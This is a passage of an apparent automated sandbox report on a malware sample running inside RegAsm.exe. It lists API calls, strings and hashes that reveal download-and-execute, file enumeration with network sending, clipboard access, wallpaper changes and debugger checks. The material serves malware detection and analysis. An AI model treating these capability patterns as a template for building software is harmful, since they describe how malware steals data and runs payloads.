                                                                                                        • Instruction Fuzzy Hash: 8EE01A76600B22EBEB211BB1AC4CD863E29F7C97637140075F90586231CB798840DA98
                                                                                                        APIs
                                                                                                        • __EH_prolog.LIBCMT ref: 004096A5
                                                                                                        • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 0040971D
                                                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 00409746
                                                                                                        • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 0040975D
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Find$File$CloseFirstH_prologNext
                                                                                                        • String ID:
                                                                                                        • API String ID: 1157919129-0
                                                                                                        • Opcode ID: d0906240c61558a8c2233d1a994a81c018a8f0e86e731917b8a7b38e081808ba
                                                                                                        • Instruction ID: 8e52766585a78a9bd0f7e398a9017c7fe376444e683812dd136b20495b515571
                                                                                                        • Opcode Fuzzy Hash: d0906240c61558a8c2233d1a994a81c018a8f0e86e731917b8a7b38e081808ba
                                                                                                        • Instruction Fuzzy Hash: 7F814C328001099BCB15EBA2DC969EDB378AF14318F10417FE506B71E2EF789E49CB58
                                                                                                        APIs
                                                                                                        • __EH_prolog.LIBCMT ref: 0040884C
                                                                                                        • FindFirstFileW.KERNEL32(00000000,?,00466618,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408905
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0040892D
                                                                                                        • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040893A
                                                                                                        • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408A50
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Find$File$CloseException@8FirstH_prologNextThrow
                                                                                                        • String ID:
                                                                                                        • API String ID: 1771804793-0
                                                                                                        • Opcode ID: 4e741940af308452b31bfecc824af122a28be594967cdadebbd3c06d1845f8b3
                                                                                                        • Instruction ID: 0d5560aa06bbfb8d15084ed76e809f646cede1ce68103026aeaac9ba950e1e68
                                                                                                        • Opcode Fuzzy Hash: 4e741940af308452b31bfecc824af122a28be594967cdadebbd3c06d1845f8b3
                                                                                                        • Instruction Fuzzy Hash: 9D517F72900209AACB04FB65DD569ED7778AF10308F50417FB906B71E2EF389B49CB89
                                                                                                        APIs
                                                                                                        • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406FF7
                                                                                                        • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 004070DB
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: DownloadExecuteFileShell
                                                                                                        • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$open
                                                                                                        • API String ID: 2825088817-3056885514
                                                                                                        • Opcode ID: 2db5f758b98399bd26730c2b59c63c355e7a7407b0b0ffb683ef3beba34d4afb
                                                                                                        • Instruction ID: 89f65c5a2840bfed21b3c91f130df949caec66636536da5e2ea9f2eef63816fc
                                                                                                        • Opcode Fuzzy Hash: 2db5f758b98399bd26730c2b59c63c355e7a7407b0b0ffb683ef3beba34d4afb
                                                                                                        • Instruction Fuzzy Hash: 5261B371A0830166CA14FB76C8569BE37A59F81758F40093FB9427B2D3EE3C9905C69B
                                                                                                        APIs
                                                                                                        • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00407892
                                                                                                        • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 0040795A
                                                                                                          • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: FileFind$FirstNextsend
                                                                                                        • String ID: XPG$XPG
                                                                                                        • API String ID: 4113138495-1962359302
                                                                                                        • Opcode ID: 20fec52da62f59381b237c22dee8d3cbdde5c4e2a63875e6a7d17fd0eeec19d6
                                                                                                        • Instruction ID: fedc3c23448d2be437c2d68ef58725aa3c97e5c0e74d328490a6b39f64eed896
                                                                                                        • Opcode Fuzzy Hash: 20fec52da62f59381b237c22dee8d3cbdde5c4e2a63875e6a7d17fd0eeec19d6
                                                                                                        • Instruction Fuzzy Hash: 2D21A4315083015BC714FB61D895CEFB3ACAF90358F40493EF696620E1FF78AA098A5B
                                                                                                        APIs
                                                                                                        • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CB68
                                                                                                          • Part of subcall function 004137AA: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004137B9
                                                                                                          • Part of subcall function 004137AA: RegSetValueExA.KERNEL32(?,004674C8,00000000,?,00000000,00000000), ref: 004137E1
                                                                                                          • Part of subcall function 004137AA: RegCloseKey.KERNEL32(?), ref: 004137EC
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CloseCreateInfoParametersSystemValue
                                                                                                        • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                                                                                        • API String ID: 4127273184-3576401099
                                                                                                        • Opcode ID: 0770bf726c9befaa45485f0dd67d4366664ca8a7637528448030d37bd09e249f
                                                                                                        • Instruction ID: 8ac436d711b2fc3476497f69dc57c3b9a547a247a31514f467319d0910454585
                                                                                                        • Opcode Fuzzy Hash: 0770bf726c9befaa45485f0dd67d4366664ca8a7637528448030d37bd09e249f
                                                                                                        • Instruction Fuzzy Hash: D7118472BC425022E81831396D9BFBE28068343F61F54456BF6022A6CAE4CF6A9143CF
                                                                                                        APIs
                                                                                                          • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                                          • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                                          • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                                          • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                                        • EnumSystemLocalesW.KERNEL32(00452143,00000001,00000000,?,JD,?,00452770,00000000,?,?,?), ref: 0045208D
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                        • String ID: p'E$JD
                                                                                                        • API String ID: 1084509184-908320845
                                                                                                        • Opcode ID: 475d6d5c58d7186cd22417851423cdf86cfe6bc0717def2965f4a7021c27fb53
                                                                                                        • Instruction ID: b0e9e6415e7ea3a3ed95e939ef0edb9d062384d4a1a0bde9f31cc9ceae225fa6
                                                                                                        • Opcode Fuzzy Hash: 475d6d5c58d7186cd22417851423cdf86cfe6bc0717def2965f4a7021c27fb53
                                                                                                        • Instruction Fuzzy Hash: 0211553A2007019FDB189F39C9916BBBB92FF8075AB14482EEE4687B41D7B5A946C740
                                                                                                        APIs
                                                                                                          • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                                          • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                                          • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                                          • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                                          • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                                                                                                          • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452197
                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004521E8
                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004522A8
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ErrorInfoLastLocale$_free$_abort
                                                                                                        • String ID:
                                                                                                        • API String ID: 2829624132-0
                                                                                                        • Opcode ID: 1ce7e7c7dfcd5f502045176aa51a1e3ace1f8c45826c3dbb4c0c9878229dab74
                                                                                                        • Instruction ID: 283aa9570716a6929da4b93cb0bca45b8c77d553a5ebfd19e37a994bad1de6ac
                                                                                                        • Opcode Fuzzy Hash: 1ce7e7c7dfcd5f502045176aa51a1e3ace1f8c45826c3dbb4c0c9878229dab74
                                                                                                        • Instruction Fuzzy Hash: F361A235500207ABDF289F24CE82B7A77A8EF05306F1441BBED05C6656E7BC9D89CB58
                                                                                                        APIs
                                                                                                        • IsDebuggerPresent.KERNEL32 ref: 0043BC69
                                                                                                        • SetUnhandledExceptionFilter.KERNEL32 ref: 0043BC73
                                                                                                        • UnhandledExceptionFilter.KERNEL32(?), ref: 0043BC80
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                        • String ID:
                                                                                                        • API String ID: 3906539128-0
                                                                                                        • Opcode ID: 1e0b73e88f7870ac8a7e49df57248e9339733cda2bb7518ac33a0b9eb889d704
                                                                                                        • Instruction ID: 25e88f5a56b9fbea854716c485460a06fbe33a825339a9765be54c88dd7cea35
                                                                                                        • Opcode Fuzzy Hash: 1e0b73e88f7870ac8a7e49df57248e9339733cda2bb7518ac33a0b9eb889d704
                                                                                                        • Instruction Fuzzy Hash: 0431D374901218ABCB21DF65D9887CDBBB8EF0C311F5051EAE81CA7251EB749F818F48
                                                                                                        APIs
                                                                                                        • GetCurrentProcess.KERNEL32(?,?,0044332B,?), ref: 00443376
                                                                                                        • TerminateProcess.KERNEL32(00000000,?,0044332B,?), ref: 0044337D
                                                                                                        • ExitProcess.KERNEL32 ref: 0044338F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Process$CurrentExitTerminate
                                                                                                        • String ID:
                                                                                                        • API String ID: 1703294689-0
                                                                                                        • Opcode ID: 4e3b9aa1e9039f050651c305726e439f17232b6e89e74059b12d513dd76054c6
                                                                                                        • Instruction ID: 4b22f3a5ffe79ca7dfb81d814e561f82a31e4bef9a776fe0bb9daccb8e878f4b
                                                                                                        • Opcode Fuzzy Hash: 4e3b9aa1e9039f050651c305726e439f17232b6e89e74059b12d513dd76054c6
                                                                                                        • Instruction Fuzzy Hash: 9FE0B635401608FBDF11AF55DE09A5D3BAAEB40B56F005469FC498A272CF79EE42CB88
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Clipboard$CloseDataOpen
                                                                                                        • String ID:
                                                                                                        • API String ID: 2058664381-0
                                                                                                        • Opcode ID: ee7560bd864c47a473b03ccd03fab4bf0c670c3a92a751b3696d255e79ff2f15
                                                                                                        • Instruction ID: 1c65eecdd0087a0ffd0b0a04a5b63b9ff0c479b34dfa65f2e767e94bdce73387
                                                                                                        • Opcode Fuzzy Hash: ee7560bd864c47a473b03ccd03fab4bf0c670c3a92a751b3696d255e79ff2f15
                                                                                                        • Instruction Fuzzy Hash: 45E0EC31745320EFC3206B609C49F9B6AA4DF85B52F05443AB905BB2E5DB78CC4086AD
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: .
                                                                                                        • API String ID: 0-248832578
                                                                                                        • Opcode ID: e4ba95ef050ff9873834a062f40f8bfe8ca2f849e5d953d5b04f24550caf4fd0
                                                                                                        • Instruction ID: 7baa6cf80f4bdea99dbc4d330b45aada8194c6230f36d830dc1b60d3871032d3
                                                                                                        • Opcode Fuzzy Hash: e4ba95ef050ff9873834a062f40f8bfe8ca2f849e5d953d5b04f24550caf4fd0
                                                                                                        • Instruction Fuzzy Hash: DF3107B1900259AFEB24DE7ACC84EFB7BBDEB46318F0401AEF41897291E6349D418B54
                                                                                                        APIs
                                                                                                          • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                                          • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                                          • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                                          • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                                        • EnumSystemLocalesW.KERNEL32(00452393,00000001,?,?,JD,?,00452734,JD,?,?,?,?,?,00444AED,?,?), ref: 00452102
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                        • String ID: JD
                                                                                                        • API String ID: 1084509184-2669065882
                                                                                                        • Opcode ID: 43afbb6a7401c46fb6bd1099fc40b6d5da7848bdbd3577d5ff827f5c50c4ae4e
                                                                                                        • Instruction ID: 883a99871793c155097d9da94a803295819168bd30f8f35cc04eca091e96b9f4
                                                                                                        • Opcode Fuzzy Hash: 43afbb6a7401c46fb6bd1099fc40b6d5da7848bdbd3577d5ff827f5c50c4ae4e
                                                                                                        • Instruction Fuzzy Hash: E8F0FF363007056FDB245F399881A6B7B96FB82769B04482EFE458B682DAB99C42D604
                                                                                                        APIs
                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,?,?,00000004), ref: 004489C0
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: InfoLocale
                                                                                                        • String ID: GetLocaleInfoEx
                                                                                                        • API String ID: 2299586839-2904428671
                                                                                                        • Opcode ID: a6f31f6a822a68a73c6fa21f72a86d6968122590954041d098649a345c0d9b9f
                                                                                                        • Instruction ID: 58f0578312c774904006f9ed4749830948a62bec6dc8fde4d932476f73229d15
                                                                                                        • Opcode Fuzzy Hash: a6f31f6a822a68a73c6fa21f72a86d6968122590954041d098649a345c0d9b9f
                                                                                                        • Instruction Fuzzy Hash: C0F0F631640608FBDB016F61DC06F6E7B25EB04751F00056EFC0966251DE368D2096DE
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 321144b451aceacc10be44255a5eb5313de52b8189587c3c0fdae4375c3dd106
                                                                                                        • Instruction ID: f88ef0336175cd1615890b4a552d96ffb4623b3c947145a2eaf1ae153763923c
                                                                                                        • Opcode Fuzzy Hash: 321144b451aceacc10be44255a5eb5313de52b8189587c3c0fdae4375c3dd106
                                                                                                        • Instruction Fuzzy Hash: AA025D71E002199BEF14CFA9D8806AEFBF1FF49314F26816AD819E7384D734AD418B85
                                                                                                        APIs
                                                                                                          • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                                          • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                                          • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                                          • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                                        • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00444AF4,?,?,?,?,?,?,00000004), ref: 00451E3A
                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,00444AF4,00000000,00444C14), ref: 00451F7B
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLast$CodeInfoLocalePageValid_abort_free
                                                                                                        • String ID:
                                                                                                        • API String ID: 1661935332-0
                                                                                                        • Opcode ID: 542ab58a55aa9f08c463a9389d0e41dfe4354c1e35855495671bf6e32f2bde7c
                                                                                                        • Instruction ID: 2c98265d6c7a89d72caae9d33925a6d6107158c78f730362dcab12f0c71d6669
                                                                                                        • Opcode Fuzzy Hash: 542ab58a55aa9f08c463a9389d0e41dfe4354c1e35855495671bf6e32f2bde7c
                                                                                                        • Instruction Fuzzy Hash: 7F611976600606AAD714AB75CC42FBB73A8EF04306F14056FFD05DB292EB78E948C769
                                                                                                        APIs
                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F72,?,?,?,?,?), ref: 00412122
                                                                                                        • HeapFree.KERNEL32(00000000), ref: 00412129
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Heap$FreeProcess
                                                                                                        • String ID:
                                                                                                        • API String ID: 3859560861-0
                                                                                                        • Opcode ID: 5801a203d1619bed6c8a9db4d4e6f7c09651a2c1722533c7d7743465b50f68e9
                                                                                                        • Instruction ID: dd486cb6b879bf1be37f4e59d5b3b18419fca2aff5c7e471244091183f2ba527
                                                                                                        • Opcode Fuzzy Hash: 5801a203d1619bed6c8a9db4d4e6f7c09651a2c1722533c7d7743465b50f68e9
                                                                                                        • Instruction Fuzzy Hash: 0D113632000B11AFC7309F54DE85957BBEAFF08715305892EF29682922CB75FCA0CB48
                                                                                                        APIs
                                                                                                        • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,004533A6,?,?,00000008,?,?,0045625D,00000000), ref: 004535D8
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ExceptionRaise
                                                                                                        • String ID:
                                                                                                        • API String ID: 3997070919-0
                                                                                                        • Opcode ID: 7607852d8e830f82297ee51b6d0742b1a7d4b3e0fd86a5f67b8f7d07b9d25eec
                                                                                                        • Instruction ID: 7263c04077df6a1dd25da4ac29b5b982fa38ace811980f45f75c7c5cedc24273
                                                                                                        • Opcode Fuzzy Hash: 7607852d8e830f82297ee51b6d0742b1a7d4b3e0fd86a5f67b8f7d07b9d25eec
                                                                                                        • Instruction Fuzzy Hash: 0FB13B315106089FD715CF28C48AB657BE0FF053A6F25865DE899CF3A2C339EA96CB44
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 0
                                                                                                        • API String ID: 0-4108050209
                                                                                                        • Opcode ID: ac460f81c2ed1c183269c9f6522614bdccbebbe18bfaf8fef360a7d89dd83e89
                                                                                                        • Instruction ID: b5ae8e6f7fa87a7dee9e60626e0a37a25df5f2dd99b83f8da903d7583ecded6c
                                                                                                        • Opcode Fuzzy Hash: ac460f81c2ed1c183269c9f6522614bdccbebbe18bfaf8fef360a7d89dd83e89
                                                                                                        • Instruction Fuzzy Hash: 0C129E727083048BD304DF65D882A1EB7E2BFCC758F15892EF495AB381DA74E915CB86
                                                                                                        APIs
                                                                                                        • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00434CCF
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: FeaturePresentProcessor
                                                                                                        • String ID:
                                                                                                        • API String ID: 2325560087-0
                                                                                                        • Opcode ID: 4259bdeace04940204f61aa74a979230364aaba3051b8f8e0efcae6fb7ed6494
                                                                                                        • Instruction ID: 5e37b39ef68b784d6588b9ddffa6793edf4c3ade0924e8be62ba08be237937aa
                                                                                                        • Opcode Fuzzy Hash: 4259bdeace04940204f61aa74a979230364aaba3051b8f8e0efcae6fb7ed6494
                                                                                                        • Instruction Fuzzy Hash: E4515B71D002488FEB24CF69D98579EBBF4FB88314F24956BD419EB264D378A940CF98
                                                                                                        APIs
                                                                                                          • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                                          • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                                          • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                                          • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                                          • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                                                                                                          • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004523E7
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLast$_free$InfoLocale_abort
                                                                                                        • String ID:
                                                                                                        • API String ID: 1663032902-0
                                                                                                        • Opcode ID: b4047fd74fafd511f87100a415ff7352fa71784cc782813174b617cf7262d9f7
                                                                                                        • Instruction ID: 2d4dd0c1c30cd12b50dfb53a4a1f7f5f9091958bb121381f53cce851c87d7921
                                                                                                        • Opcode Fuzzy Hash: b4047fd74fafd511f87100a415ff7352fa71784cc782813174b617cf7262d9f7
                                                                                                        • Instruction Fuzzy Hash: F921D632600606ABDB249F25DD41FBB73A8EB06316F10407FED01D6152EBBC9D48CB59
                                                                                                        APIs
                                                                                                          • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                                          • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                                          • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                                          • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                                        • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00452361,00000000,00000000,?), ref: 004525EF
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLast$InfoLocale_abort_free
                                                                                                        • String ID:
                                                                                                        • API String ID: 2692324296-0
                                                                                                        • Opcode ID: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
                                                                                                        • Instruction ID: 8c29d710edde3bbc403447a64c1727e90569dbd09ff88c71ffccea9529c81983
                                                                                                        • Opcode Fuzzy Hash: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
                                                                                                        • Instruction Fuzzy Hash: C4F04936A00116BBDB245A24D905BBF7B58EB01315F04446BEC05A3241FAF8FD058694
                                                                                                        APIs
                                                                                                          • Part of subcall function 00445909: EnterCriticalSection.KERNEL32(-0006D41D,?,0044305C,00000000,0046E938,0000000C,00443017,?,?,?,00445BA7,?,?,0044834A,00000001,00000364), ref: 00445918
                                                                                                        • EnumSystemLocalesW.KERNEL32(0044843E,00000001,0046EAE0,0000000C), ref: 004484BC
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                        • String ID:
                                                                                                        • API String ID: 1272433827-0
                                                                                                        • Opcode ID: 08771b5932cf67d2f7a499a1ea32343f451e1cff339441a182db03018af17ba2
